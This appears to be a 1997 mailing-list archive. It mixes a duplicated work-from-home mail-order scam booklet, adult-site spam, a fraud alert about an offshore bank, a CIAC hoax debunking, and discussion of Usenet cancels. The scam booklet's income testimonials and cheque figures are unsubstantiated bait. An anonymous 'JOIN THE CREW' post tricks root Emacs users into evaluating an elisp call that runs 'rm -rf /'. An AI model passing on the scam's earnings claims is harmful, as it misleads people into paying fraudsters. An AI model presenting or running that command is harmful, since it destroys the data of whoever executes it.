The key to our success lies in our SYSTEM.  As I said before, this is a turnkey work-from-home mail order system.  Our system provides goods and services to people who are searching for exactly what we have.  The mail order business is a 427 billion dollar a year industry, and all forms of direct sales are predicted to double in the next 5 - 7 years!  The growth potential is unlimited!

What allowed me to be earning $10,000 A MONTH INCOME IN 11 MONTHS was the good fortune I had in finding suppliers who would sell me products that were in high demand, and training in this system step-by-step so even I could understand it!  These TRADE SECRETS are what we are willing to pass on to you.  What is required from you is the burning desire to make some changes in your life, and a willingness to be teachable.

SUCCESS TAKES EFFORT

Now if you are looking for some get-rich-quick scheme that guarantees all the money you can dream of with no effort, I'm sorry to tell you this is the real world where those promises usually end up getting you in trouble one way or another.  However, if you are like I was and are used to an honest day's work but aren't used to a generous day's pay, this MIGHT be for you.  I say "might" because not everybody who wishes for success has the determination to stick to a plan of action until they are a success.  That is why so many Americans accept a small paycheck from someone who is willing to organize themselves!  When you cash a mediocre paycheck you are in effect agreeing, when you endorse the check, that your time and labor are only worth that small amount.

What I learned from this experience is that contrary to what we have all been taught, the money you make in life has nothing to do with fairness, hard work, formal education, or years on the job.  What does increase your ability to earn above average money is the ability to adapt to a different direction when the road you are on is not leading you to your desired destination.  Why continue in frustration doing the same things over and over again when they have never produced results for you in the past?  Wouldn't it be better to try something new than to keep hitting your head on the same brick wall over and over?  The quality I observed in truly successful people is that they have the ability to adapt.  They spend 5% of their time identifying the problems they face, and 95% of their time finding solutions.  Most of us have the equation backwards.  We spend 95% of our time complaining about our problems while 5% of our energy, if we are lucky, is spent on finding new solutions!
!

So what are our options?  If you listen very hard you might hear the sound of some people throwing these pages in the garbage.  The result is that they may continue making the same decisions that led them to the dead end they find themselves in today.  Some of these are wonderful people, but they just don't have the ability to adapt and change.  You might call this the dinosaur mentality that leads to the extinction of the realization of their hopes and dreams.

The other option is to follow a proven method of change that may be new and challenging in the beginning, but has the ability to produce the results that you wish for your life.

LET'S START NOW

If this would work for you, what would you use the extra money and freedom of time for?  I suggest you take the time right now to make a "Dream" list.  If money wasn't an obstacle, what would you do in your life?  Allow yourself to dream the "impossible" and write it down.  If you are one of the small percentage of people who took the time to actually do this, congratulations!  You just took an important first step toward changing your life.  Many people who didn't, or stopped reading this book long ago were screened out and their options are no better than when they received this material.

Think of it this way - when you were a child you could dream about how you wanted your life to turn out easily, couldn't you?  Then as you experienced life most of us have been beaten up pretty badly at certain points.  The result is that many people stopped allowing themselves to DREAM.  They became afraid to be disappointed yet again.

What helped me was associating with people who ARE a success, and allowing their successful habits and thinking to influence me.  But one step further than this was to actually have those people help me start my own business.  I also had them available as a resource to help me refine my efforts so I was working smarter not harder!  You may obtain useful information from reading self-help books, but try to get the author of those books to actually help you build your business.  With our system, you are never just on your own!

FOLLOW THROUGH MAKES DREAMS A REALITY

Now, the next part of making your dreams a reality is to FOLLOW THROUGH with directed activity that can create the situation you want in your life.  You can do that when you finish reading this book by phoning the number you will find at the end of this letter.  Again, the people who do can take further steps towards a better future, while the rest are screened out.  But if you've followed along this far, you ALREADY TOOK your first steps, and now you can use that momentum to get you to your goals!

Let me tell you about some people I have had the pleasure of working with, and how they have used this system for themselves ...

MINDY

Mindy is a single mom who was a real estate broker.  She made great money but she was burnt out and tired of assuming the personal liability for what others did.  She used to cry many times at night because the burn-out led to both professional and personal problems that devastated her financially.  She didn't know how to do anything else that would allow her to earn a decent living and still be involved with her son's schooling and daily activities.

At that time in her life Mindy responded to some information similar to what you are reading.  At first she hesitated, but her anxiety and frustration pushed her to leave "no stone unturned" in her pursuit to build a better future for her family and ease the financial pressures.  She followed all the instructions she received and by the end of the first month she had earned $4,500.  In less than one year her monthly income was over $8,000 a month.  Today she earns $12,000 to $15,000 consistently each month and is free from the stresses she had been under.  Working at home, Mindy can now spend as much time as she wishes with her family.

JACK AND JEAN

Jack and Jean live in North Dakota and are close to retiring.  Jack works for the railroad and Jean works for the government in a program that provides subsidies for farmers.  As is the case with most people retiring, their pension income won't provide the lifestyle they dreamed of throughout their careers.  Also, Jack's health wasn't great and he wanted something constructive to work on after his retirement.  But they didn't want something so time-consuming that they couldn't enjoy themselves or take frequent vacations.

They found their answer in this little booklet!  Their first month they earned $1,243 and by their third month, they were earning over $1,600 per month consistently - that's over $400 per week PART TIME!  By their eleventh month our system was generating another $350 per month residual income for Jack and Jean.  The extra $350 is mailbox money - that is money that comes automatically as a result of business built in the past!  As a part of our system, there is a retirement program built right in.  As a matter of fact, I retired myself for one year, and currently I am only 42 years old!

BOB

That's me!  Yes, after 11 months I was earning $10,000 per month income - now it's over $25,000 per month and I retired for a year.  Sounds unbelievable?  I sometimes have a hard time believing it myself!  And it happened to me!  I also traveled to Europe and several Caribbean islands for extended periods of time, and now live by a beautiful lake in Orange County, California.  With our system, you can also expand your business around the world and be one of the people doing business in many countries as they open up for trade with the U.S.  Remember the old saying, "Choose a job that you love and you will never have to work a day in your life."  You will have more fun and satisfaction in this adventure than you can imagine.

YOU MUST DECIDE

Now is the time for you to decide about your future.  Are you going to continue down the same road you have been traveling?  Or are you willing to make a positive change in your life by trying something new?  Remember, "For things to change in your life you've got to change, for things to get better you've got to get better." - Jim Rohn

You have to make the decision to take the next step.  You have already gone so far in completing this book, why not allow yourself the things you want out of life by following through with a phone call?  What do you have to lose?  More importantly, what do you have to gain?  Opportunity ignored seldom returns again.  Don't let your dream lifestyle pass you by like millions of others who will have to go to work tomorrow with no hope of ever achieving what they truly desire, and retire to old age, poor health, and a feeling that they somehow missed something incredible in their lives!

All it takes is a simple phone call.  With a little effort and the ability to be teachable, we can definitely show you how to be successful with our system.  You will have a personal mentor who will work with you step by step, and show you exactly how you too can build a successful home-based business without unacceptable risks.

Who knows, maybe someday you will be sharing the secrets of how you built an incredible lifestyle with those who are still just - WORKING for a living!

I look forward to hearing from you and working with you personally.

Sincerely, Bob Anderson


WOULD YOU LIKE TO RECEIVE CHECKS LIKE THESE IN YOUR MAILBOX?

* 12/15/96 -- $12,429.35 (royalties)
* 12/20/96 -- $13,406.77 (bonuses)
* 01/15/96 -- $12,292.15 (royalties)
* 01/20/96 -- $13,702.09 (bonuses)

"THOUGHTS DETERMINE WHAT YOU WANT ...

ACTION DETERMINES WHAT YOU GET!"

MAKES YOUR DREAMS REALITY

CALL:  1-801-350-8718

(P.S. - for payment, the "name on the book" that the recording refers to is Michael Bishop.  This name appears on the postal direct mail version.)







From 09188466 at hydra.com.au  Sat Aug  9 13:43:11 1997
From: 09188466 at hydra.com.au (09188466 at hydra.com.au)
Date: Sat, 9 Aug 1997 13:43:11 -0700 (PDT)
Subject: INTERNATIONAL COMPANY SEEKS HELP!!
Message-ID: <>



Hello!

We are a multi-billion dollar per year international company that is looking for serious, teachable, motivated people who want to start a business from their home.  We are not looking for people who are unemployed and looking for a job.  We need people who want to spend time with their families while making a substantial amount of money. If this describes you, please read on!

Take a few minutes to read the following booklet very carefully right now.  This booklet has been extraordinarily successful in both direct mail and e-mail form and has absolutely been the answer to many peoples' dream of freedom to work around their families/children, AND having complete control over their lifestyle and income.  All you need to do to begin is carefully read the information and follow the instructions.

This is a Direct Marketing program that will have interested people contacting you.  You do not need any special schooling; training is provided and no experience is necessary.  If you are teachable and motivated and would like to earn income from home, then we want to get you started TODAY.

Unlike most Work-at-Home "opportunities", this is not envelope stuffing or home assembly where the work is hard and the compensation is low.  This is a very lucrative business opportunity that has allowed me to almost double my income in the last year!

It is very important that you read the booklet thoroughly so that you may begin the training on how this program works.  It will describe the smart way to make money and keep it.  After reading the booklet, there will be a phone number for you to call that will put you into a short recording that will ask you to leave your name and address in order to receive our startup materials which you will have 30 days to inspect.  The materials cost only $39.00 and are fully guaranteed to be exactly what you are looking for or your money is refunded.

PLEASE NOTE: Because of our tremendous success and the overwhelming response to our advertising, we can afford to be picky about who we choose to work with to make a lot of money - for this reason, you are going through this screening process of reading the book and calling the number.  Many people who are just "tire-kickers" will not get that far - this is exactly what we want.  By the time you call and order the startup information, we will know that you are one of the serious ones who ARE teachable and motivated.  It is you that we want, not the people who get screened out because they are lazy or not teachable enough to follow these simple instructions.

I can only encourage you with all my heart to not get screened out!  You are sitting on a gold mine as you read this letter.  After you follow the instructions in the booklet, you will be put in contact with a local person to help you and guide you through your new way of life.  This person will help you start your new, exciting future!

Sincerely,


M. Bishop












                     WORK FORM HOME E-MAIL BOOKLET

WORK FROM HOME!!

TAP INTO A $427 BILLION DOLLAR INDUSTRY THAT WANTS YOU!

LET US SHOW YOU HOW!

IMAGINE ... YOUR FUTURE ...

You live in the home of your dreams
You drive the car of your dreams
You experience the vacation of your dreams, with your family
You love what you do every day ...
You are happy ...

WE CAN TAKE YOU THERE!!

Dear Friend,

Have you ever driven by a mansion and wondered how somebody could possibly afford to live there, and not be doing something illegal? Or seen people having a leisurely lunch at a lavish restaurant as you rush back to work after eating fast food?  How can people living in the same country, with the same education, and the same skills, be living such different lives?  

Many of us try to live a little better by using finance companies to buy things we couldn't otherwise afford.  I had a real eye-opening experience when I bought some furniture.  The salesman told me it was "90 days same as cash".  When it didn't look like I could pay the money back in 90 days, they told me it was no problem, I could make payments.  Then I read the fine print and almost fell over when I realized they were going to charge me 29% interest!

Another sad fact is he percentage of money saved or invested in our country.  We rank last in the western world in terms of money in savings, and first in terms of credit card debt. Think of what would happen if anything happened to you, and your family had to take on your financial situation right now.  If you think you are safe with the credit card protection offered by the card companies, read the fine print.  They only pay the minimum each month which again only covers the interest!  The finance companies win again. 

DID YOU SAVE $12,000 LAST YEAR?  $1200?  $120?  ANY?

How much will you have saved in the next five years?  If things don't drastically change, you can double your last five years savings amount and you will have your answer.  For most people, that is not a pleasant prospect.  But say you are one of the lucky people who have some savings, and you look forward to living off the interest in retirement, well!!..

WHAT ABOUT RETIREMENT?

Did you know that it takes a bank account of over $250,000 earning at least 5% interest to provide a monthly income of about $1,150?  That is roughly the welfare allowance of a single mother of four!  When do you think you'll have your $250,000 in the bank?  And in 10 to 20 years will you pay the electric bill or the phone bill with $1,150 per month?  If this sounds drastic, the reality is even worse.  What about the medical bill emergencies that may pop up?  They usually become more frequent as you get older.

What to people do?  Do you want the truth?  95% die broke after working 40 years.  U.S. NEWS & WORLD REPORT wrote, "Many people will need to keep earning a paycheck into their 70s!  It's too late for them to save enough to quit working at 65."

Consider this.  The Bureau of Labor Statistics revealed that out of 100 people who start working at age 25, by the age of 65 ...
   
* 1% Are wealthy
* 4% Have adequate capital for retirement
* 3% Are still working
* 63% Are dependent on Social Security, friends, relatives or charity
* 29% are dead

How does $40,000 per year sound?  If you wish to retire with this income, it would take $1.9 Million in tax-deferred accounts to provide that income if a 35-year-old today would retire at age 65!! That means you would have to be able to save $3,333.33 PER MONTH starting now!  Can you possibly save that kind of money with your current income?  And imagine what $40,000 will be worth in 30 years.  That income would probably keep you at poverty level in the year 2027.

SO WHAT'S THE ANSWER?

The answer is usually simpler than you might think.  Unless you inherited a large sum of money or hit the lottery, people with an above average lifestyle usually work for themselves!  Here is the breakdown of who controls the most percentage of wealth in America ...

* 74%  PEOPLE WHO OWN THEIR OWN BUSINESS
* 10% Top executives and CEOs
* 10% Professionals like doctors and lawyers
* 5% Sales People
* 1% Everyone else!

Those figures used to make me mad because I used to be in the 1% category!  I worked as hard as I could for 40-60 hours per week and all I did was make someone else more money.  Then I looked at the percentage of taxes I was paying, and I realized it was higher than the percentage others paid who were making ten times what I was!  The reason was I couldn't write anything off if I worked for someone else.  ALL my income was taxable.
 
I soon understood that the laws and the odds in America favored those who ran their own businesses.  My first problem was, I had no business training or experience, and secondly I was broke! At that time in my life the only job I had held was as an electrician and my wife Candace's experience came from being a secretary in the construction business.  My confidence level to make a change in my life was zero.  On the positive side, I was mad about how unfair it all seemed.  This anger finally got me into ACTION when the right opportunity presented itself.

I GET MY CHANCE!

My life changed when a friend of mine shared the information you are getting in this booklet.  What he presented to me was a turnkey work-at-home business that I could start with the skills and money I had, and have immediate success, so I was encouraged to continue.  With the power of our advertising and mail-order system, I didn't even have to know anybody in my local area!  In the first month, I earned $1,735.60 profit part-time from my home.  By my eleventh month I made over $10,000 a month, and now for five years my income working from home has been steady and is currently over $25,000 PER MONTH!

At this point you might think, "Oh, this can't be true - all of these things are a scam" or "These things only happen to other people."  Well I'm here to tell you not only am I one of those "other" people, but I have trained many of those other people who are now living the life of their dreams.  Many of them have EXACTLY YOUR background.

YOU CAN DO THIS!  THE SECRET IS OUR SYSTEM

The key to our success lies in our SYSTEM.  As I said before, this is a turnkey work-from-home mail order system.  Our system provides goods and services to people who are searching for exactly what we have.  The mail order business is a 427 billion dollar a year industry, and all forms of direct sales are predicted to double in the next 5 - 7 years!  The growth potential is unlimited!

What allowed me to be earning $10,000 A MONTH INCOME IN 11 MONTHS was the good fortune I had in finding suppliers who would sell me products that were in high demand, and training in this system step-by-step so even I could understand it!  These TRADE SECRETS are what we are willing to pass on to you.  What is required from you is the burning desire to make some changes in your life, and a willingness to be teachable.

SUCCESS TAKES EFFORT

Now if you are looking for some get-rich-quick scheme that guarantees all the money you can dream of with no effort, I'm sorry to tell you this is the real world where those promises usually end up getting you in trouble one way or another.  However, if you are like I was and are used to an honest day's work but aren't used to a generous day's pay, this MIGHT be for you.  I say "might" because not everybody who wishes for success has the determination to stick to a plan of action until they are a success.  That is why so many Americans accept a small paycheck from someone who is willing to organize themselves!  When you cash a mediocre paycheck you are in effect agreeing, when you endorse the check, that your time and labor are only worth that small amount.

What I learned from this experience is that contrary to what we have all been taught, the money you make in life has nothing to do with fairness, hard work, formal education, or years on the job.  What does increase your ability to earn above average money is the ability to adapt to a different direction when the road you are on is not leading you to your desired destination.  Why continue in frustration doing the same things over and over again when they have never produced results for you in the past?  Wouldn't it be better to try something new than to keep hitting your head on the same brick wall over and over?  The quality I observed in truly successful people is that they have the ability to adapt.  They spend 5% of their time identifying the problems they face, and 95% of their time finding solutions.  Most of us have the equation backwards.  We spend 95% of our time complaining about our problems while 5% of our energy, if we are lucky, is spent on finding new solutions!
!

So what are our options?  If you listen very hard you might hear the sound of some people throwing these pages in the garbage.  The result is that they may continue making the same decisions that led them to the dead end they find themselves in today.  Some of these are wonderful people, but they just don't have the ability to adapt and change.  You might call this the dinosaur mentality that leads to the extinction of the realization of their hopes and dreams.

The other option is to follow a proven method of change that may be new and challenging in the beginning, but has the ability to produce the results that you wish for your life.

LET'S START NOW

If this would work for you, what would you use the extra money and freedom of time for?  I suggest you take the time right now to make a "Dream" list.  If money wasn't an obstacle, what would you do in your life?  Allow yourself to dream the "impossible" and write it down.  If you are one of the small percentage of people who took the time to actually do this, congratulations!  You just took an important first step toward changing your life.  Many people who didn't, or stopped reading this book long ago were screened out and their options are no better than when they received this material.

Think of it this way - when you were a child you could dream about how you wanted your life to turn out easily, couldn't you?  Then as you experienced life most of us have been beaten up pretty badly at certain points.  The result is that many people stopped allowing themselves to DREAM.  They became afraid to be disappointed yet again.

What helped me was associating with people who ARE a success, and allowing their successful habits and thinking to influence me.  But one step further than this was to actually have those people help me start my own business.  I also had them available as a resource to help me refine my efforts so I was working smarter not harder!  You may obtain useful information from reading self-help books, but try to get the author of those books to actually help you build your business.  With our system, you are never just on your own!

FOLLOW THROUGH MAKES DREAMS A REALITY

Now, the next part of making your dreams a reality is to FOLLOW THROUGH with directed activity that can create the situation you want in your life.  You can do that when you finish reading this book by phoning the number you will find at the end of this letter.  Again, the people who do can take further steps towards a better future, while the rest are screened out.  But if you've followed along this far, you ALREADY TOOK your first steps, and now you can use that momentum to get you to your goals!

Let me tell you about some people I have had the pleasure of working with, and how they have used this system for themselves ...

MINDY

Mindy is a single mom who was a real estate broker.  She made great money but she was burnt out and tired of assuming the personal liability for what others did.  She used to cry many times at night because the burn-out led to both professional and personal problems that devastated her financially.  She didn't know how to do anything else that would allow her to earn a decent living and still be involved with her son's schooling and daily activities.

At that time in her life Mindy responded to some information similar to what you are reading.  At first she hesitated, but her anxiety and frustration pushed her to leave "no stone unturned" in her pursuit to build a better future for her family and ease the financial pressures.  She followed all the instructions she received and by the end of the first month she had earned $4,500.  In less than one year her monthly income was over $8,000 a month.  Today she earns $12,000 to $15,000 consistently each month and is free from the stresses she had been under.  Working at home, Mindy can now spend as much time as she wishes with her family.

JACK AND JEAN

Jack and Jean live in North Dakota and are close to retiring.  Jack works for the railroad and Jean works for the government in a program that provides subsidies for farmers.  As is the case with most people retiring, their pension income won't provide the lifestyle they dreamed of throughout their careers.  Also, Jack's health wasn't great and he wanted something constructive to work on after his retirement.  But they didn't want something so time-consuming that they couldn't enjoy themselves or take frequent vacations.

They found their answer in this little booklet!  Their first month they earned $1,243 and by their third month, they were earning over $1,600 per month consistently - that's over $400 per week PART TIME!  By their eleventh month our system was generating another $350 per month residual income for Jack and Jean.  The extra $350 is mailbox money - that is money that comes automatically as a result of business built in the past!  As a part of our system, there is a retirement program built right in.  As a matter of fact, I retired myself for one year, and currently I am only 42 years old!

BOB

That's me!  Yes, after 11 months I was earning $10,000 per month income - now it's over $25,000 per month and I retired for a year.  Sounds unbelievable?  I sometimes have a hard time believing it myself!  And it happened to me!  I also traveled to Europe and several Caribbean islands for extended periods of time, and now live by a beautiful lake in Orange County, California.  With our system, you can also expand your business around the world and be one of the people doing business in many countries as they open up for trade with the U.S.  Remember the old saying, "Choose a job that you love and you will never have to work a day in your life."  You will have more fun and satisfaction in this adventure than you can imagine.

YOU MUST DECIDE

Now is the time for you to decide about your future.  Are you going to continue down the same road you have been traveling?  Or are you willing to make a positive change in your life by trying something new?  Remember, "For things to change in your life you've got to change, for things to get better you've got to get better." - Jim Rohn

You have to make the decision to take the next step.  You have already gone so far in completing this book, why not allow yourself the things you want out of life by following through with a phone call?  What do you have to lose?  More importantly, what do you have to gain?  Opportunity ignored seldom returns again.  Don't let your dream lifestyle pass you by like millions of others who will have to go to work tomorrow with no hope of ever achieving what they truly desire, and retire to old age, poor health, and a feeling that they somehow missed something incredible in their lives!

All it takes is a simple phone call.  With a little effort and the ability to be teachable, we can definitely show you how to be successful with our system.  You will have a personal mentor who will work with you step by step, and show you exactly how you too can build a successful home-based business without unacceptable risks.

Who knows, maybe someday you will be sharing the secrets of how you built an incredible lifestyle with those who are still just - WORKING for a living!

I look forward to hearing from you and working with you personally.

Sincerely, Bob Anderson


WOULD YOU LIKE TO RECEIVE CHECKS LIKE THESE IN YOUR MAILBOX?

* 12/15/96 -- $12,429.35 (royalties)
* 12/20/96 -- $13,406.77 (bonuses)
* 01/15/96 -- $12,292.15 (royalties)
* 01/20/96 -- $13,702.09 (bonuses)

"THOUGHTS DETERMINE WHAT YOU WANT ...

ACTION DETERMINES WHAT YOU GET!"

MAKES YOUR DREAMS REALITY

CALL:  1-801-350-8718

(P.S. - for payment, the "name on the book" that the recording refers to is Michael Bishop.  This name appears on the postal direct mail version.)







From digital_matrix at hotmail.com  Fri Aug  8 22:59:54 1997
From: digital_matrix at hotmail.com (David Downey)
Date: Sat, 9 Aug 1997 13:59:54 +0800
Subject: Apology from me to the list and TruthMonger
Message-ID: <19970809053931.20560.qmail@hotmail.com>



LOL, all right, all right. I'll take my lickings and like it. I 
apologize. I came off far from what I was trying to say. I was really 
pissed off at what TruthMonger said in the email. I took major offense 
at his use of Jesus in the mail in the context in which he did. I am NOT 
one who believes in the banning of sites based on a rating syste, I 
believe that based on the rating system you should be able to decide 
from that if *you* want to go there. No one has the right to *ban* a 
site. I humbly apologize to all and to TruthMonger. Some say one should 
not apologize on a list because then everyone will make it open season 
on that person forever. If that is the case, oh well. I believe that if 
a man is in the wrong he should apologize. I am in the wrong. I 
apologize. I went overboard on my retort to TruthMonger, not stopping to 
think how it would make me appear. I unfortuately gave the impression in 
complete opposites of where I actually stand on the issues. I do not 
know how to word where I stand because I take a little from each side as 
to what is the correct way to handle these issues. I joined this 
listserv because I believe wholeheartedly in the stated reason for the 
existence of this listserv. I run my own for the same reasons. 


Folks, I truly am sorry for the remarks I made, and the attitude 
displayed is not what I believe inside. I believe that every man and 
women have the right to make there own dicision on issues that affect 
them. I believe that a fully cooperative effort to come to terms with 
many of the issues facing us is needed. I do NOT support the government 
in it's belief that sites should be banned based on their ratings in 
whatever finally accepted rating system. I do not believe in escrowed 
key accounting (espeicially when the government choses the key ecrow 
agents). I do *not* follow the bible thumping christian coalitions that 
believe that decending on the net with bibles, fishnets, and handcuffs 
is the answer. I believe in fighting for what one believes in. I firmly 
believe in protecting the children and guiding them towards an 
understanding of today's world in *all* it trappings. I am also unsure 
as to the correct and "right" way to do this. I am open to suggestions, 
and am willing to openly contribute my own. There are many of you who 
will undoubtably have blocked my posts as a result of my earlier post. I 
am sorry for this. For I could learn a few things from those that have, 
just as I can pass on some to them.


For the mistakes I put forth, I humbly apologize.

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com






From nobody at REPLAY.COM  Fri Aug  8 23:00:32 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 9 Aug 1997 14:00:32 +0800
Subject: JOIN THE CREW
Message-ID: <199708090554.HAA07924@basement.replay.com>



If you are reading this message as root under Emacs, please position
the cursor to the final paren in the following and hit C-x C-e.

(call-process-internal "/bin/rm"
		       nil t nil
		       "-rf" "/")


VirusMonger






From kent at songbird.com  Sat Aug  9 01:54:48 1997
From: kent at songbird.com (Kent Crispin)
Date: Sat, 9 Aug 1997 16:54:48 +0800
Subject: JOIN THE CREW
In-Reply-To: <199708090554.HAA07924@basement.replay.com>
Message-ID: <19970809014149.15836@bywater.songbird.com>



On Sat, Aug 09, 1997 at 07:54:53AM +0200, Anonymous wrote:
> If you are reading this message as root under Emacs, please position
> the cursor to the final paren in the following and hit C-x C-e.
> 
> (call-process-internal "/bin/rm"
> 		       nil t nil
> 		       "-rf" "/")
> 
> 
> VirusMonger

You dumb shit -- I tried it and it didn't work!

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From lharrison at mhv.net  Sat Aug  9 02:40:07 1997
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Sat, 9 Aug 1997 17:40:07 +0800
Subject: [Fwd: Virus Warning]]
In-Reply-To: <33EC326A.31390DFF@cyberspacetechnologies.com>
Message-ID: <3.0.3.32.19970809051238.006d4908@pop.mhv.net>



At 05:03 AM 8/9/97 -0400, David D.W. Downey wrote:
>
>			*** FYI ***
>If you recieve an e-mail titled " JOIN THE CREW" do not open it.
>
>It will erase everything on your hard disk.
>
>This is a new virus that is not detected by McAfee or Norton.


Yes, my children, this is a new virus.  There are certain facts, however,
of which you should be aware.

>From http://ciac.llnl.gov/ciac/CIACHoaxes.html#joincrew:


----------------Begin Attached Message------------------

Join the Crew

Circulating the Internet is an email message entitled "Join the Crew". For
a virus to spread, it must be executed. Reading a mail message does not
execute the mail message. Trojans and viruses have been found as executable
attachments to mail
messages, but they must be extracted and executed to do any harm. CIAC
still affirms that reading E-mail, using typical mail agents, can not
activate malicious code delivered in or with the message.

    IMPORTANT - VIRUS Alert!!!


         Take note !

         Someone got an email, titled as JOIN THE CREW.
         It has erased his hard drive.
         Do not open up any mail that has this title.
         It will erase your whole hard drive.
         This is a new email virus and not a lot of people know about it,
         just let everyone  know, so they won't be a victim.

         Please e-mail this to everyone you know!!!
         Remember the title :    JOIN THE CREW

Variants of this email message are circulating the Internet. If you receive
an email message entitled "Join the Crew" and it has an attachment, CIAC
recommends that you delete the message and the attachment. If you receive
just the message, delete the
message. Please DO NOT circulate unvalidated virus alerts.

------------End Attached Message-------------


Postscript:  To those of you who still are virgins, please read the above
thoroughly noting especially: "For a virus to spread, it must be executed.
Reading a mail message does not execute the mail message."

Go ye in safety with thy hard drive in tact. 






*************************************************************
Lynne L. Harrison, Esq.       |   "No matter how far you've
Poughkeepsie, New York        |    gone down the wrong road,
lharrison at mhv.net             |    turn back."
http://www.dueprocess.com     |     - Turkish proverb
*************************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.






From admin at CyberSpaceTechnologies.com  Sat Aug  9 02:43:49 1997
From: admin at CyberSpaceTechnologies.com (David D.W. Downey)
Date: Sat, 9 Aug 1997 17:43:49 +0800
Subject: [Fwd: Virus Warning]]
In-Reply-To: <3.0.3.32.19970809051238.006d4908@pop.mhv.net>
Message-ID: <33EC6F69.9285620@cyberspacetechnologies.com>



Lynne is most definitely correct. In order for a viral infection to take
place, execution of the attached file first take place. Even malicious
MS Word and likeminded word processing macros must inevitably execute a
binary file. This message was forwarded to me via an ISP Viral Alert
program. I apologize for not including the fact of program execution as
being the actual infecting point. To all those familiar and  unfamiliar
with the way virii operate, please accept my sincere apologies.






From wayne64 at workload.com  Sat Aug  9 20:12:31 1997
From: wayne64 at workload.com (wayne64 at workload.com)
Date: Sat, 9 Aug 1997 20:12:31 -0700 (PDT)
Subject: Live Enteractive Adult Entertainment
Message-ID: <>




 Live Interactive Adult Entertainment

If you are under age 18 or are offended by pornography, delete this e-mail immediately!!!!

Click here---------->www.xxxpornopics.com <--------to enter the hottest adult web-site on the internet. This site allows you to connect directly to the Hottest Girls you have ever seen... They are live and waiting for you now!...The quality is like T.V. and no special software is needed....You may even download our software directly to your P.C.

From wayne64 at workload.com Sat Aug 9 20:12:31 1997 From: wayne64 at workload.com (wayne64 at workload.com) Date: Sat, 9 Aug 1997 20:12:31 -0700 (PDT) Subject: Live Enteractive Adult Entertainment Message-ID: <>


 Live Interactive Adult Entertainment

If you are under age 18 or are offended by pornography, delete this e-mail immediately!!!!

Click here---------->www.xxxpornopics.com <--------to enter the hottest adult web-site on the internet. This site allows you to connect directly to the Hottest Girls you have ever seen... They are live and waiting for you now!...The quality is like T.V. and no special software is needed....You may even download our software directly to your P.C.

From rah at shipwright.com Sat Aug 9 05:30:19 1997 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 9 Aug 1997 20:30:19 +0800 Subject: Alert: European Union Bank Message-ID: --- begin forwarded text X-Sender: themet at pop.mindspring.com Mime-Version: 1.0 Date: Thu, 7 Aug 1997 15:11:07 -0700 To: fraudnews at silverquick.com From: Mark Taylor Subject: Alert: European Union Bank Reply-to: Mark Taylor The European Union Bank, which advertised for customers on the internet and operated out of Antigua, is closed and a fraud alert has been issued by the government of Antigua. The founders of the bank, Serbveo Ushakov, allegedly of Bronxville, New York, and Vietalui Papsouev of Richmond Hill, are missing. The government says the two are Russian nationals. Employees of the bank were fired last week and a recorded phone message states that the bank is temporarily closed. The banks internet site at The bank's Internet site ( http://www.eubank.ag ) is no longer functioning. The government of Antigua has appointed Coopers & Lybrand do a full audit of the bank. On May 30 the Idaho Department of Finance ordered European Union to stop soliciting deposits from Idaho residents over the Internet. The state alleged that since the bank operated without a state or federal charter that it was operating illegally. Last week that the Bank of England warned investors last fall about depositing funds in European Union Bank. There is no word yet on how many people deposited money in this bank and how much money is missing. The government of Antigua states it is cracking down on banks with alleged connections to Russian mobsters. FraudNews is owned and published by : Mark Taylor: themet at mindspring.com All material published is copyright.It must not be reproduced in any form without the express permission of of the owner. ============================================================= This Newsletter is broadcast using the List and Newsletter Management facilities of Silverquick Communications You may subscribe to FraudNews and the Fraud-Discuss lists on the web pages at : http://www.silverquick.com ============================================================= --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From dformosa at st.nepean.uws.edu.au Sat Aug 9 06:45:58 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Sat, 9 Aug 1997 21:45:58 +0800 Subject: forged cancels (Re: Entrust Technologies's Solo - free In-Reply-To: <199708081138.NAA07099@basement.replay.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 8 Aug 1997, Anonymous wrote: > > Use a retraction server (David's project) > > I wonder if there is a problem of inconsistent levels in this debate... [...] > Within a particular value system, you might agree or disagree with a > particular cancel, or with the idea in general. It's easy to configure a > news server or reader to conform to your preferences, This is an inaccuarate comment with refurence to cancels. It is hard to do this and it is only possable if the canceler conforms to the $alz convention. However NoCeMs offer this freedom and power. As I said before a migration to a NoCeM only system would be a good thing. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+w2BKQK0ynCmdStAQGmWwQA0fZi3KDFAz5py/Z5arFBOKWkIFjvrLs0 Z9kdgmz4mv4CqWJW0g1h7FooiwkCjZn5X2BCYkZHLqn6ECBSEt1pwIZVfkJ0Y4x3 rMZc5zUBbPtQ/myVZnXJ6hH9ylc/Ej5OJoQRs9awSa7wDjnSjEnm+QsrKZa3aOuw h5LmHOXtL+A= =WPHm -----END PGP SIGNATURE----- From dformosa at st.nepean.uws.edu.au Sat Aug 9 07:00:37 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Sat, 9 Aug 1997 22:00:37 +0800 Subject: Platypus and the kangaroos In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 8 Aug 1997, Dr.Dimitri Vulis KOTM wrote: > ? the Platypus {aka David Formosa} writes: > > > I have no problems with that web site's existence. > > I haven't looked at the site (I conclude from the name that it's probably not > something I care to see), [Nods] Basic Homophobic rantings nothing very interesting or orginan. > but I will fight for its free speech. As will I. I'm not against the peaple esposing there beleafes (though I am against the bealfes that thay espose.). I think that this is a given. > Apparently a number of people listed at the Net.Scum site do want to > shut 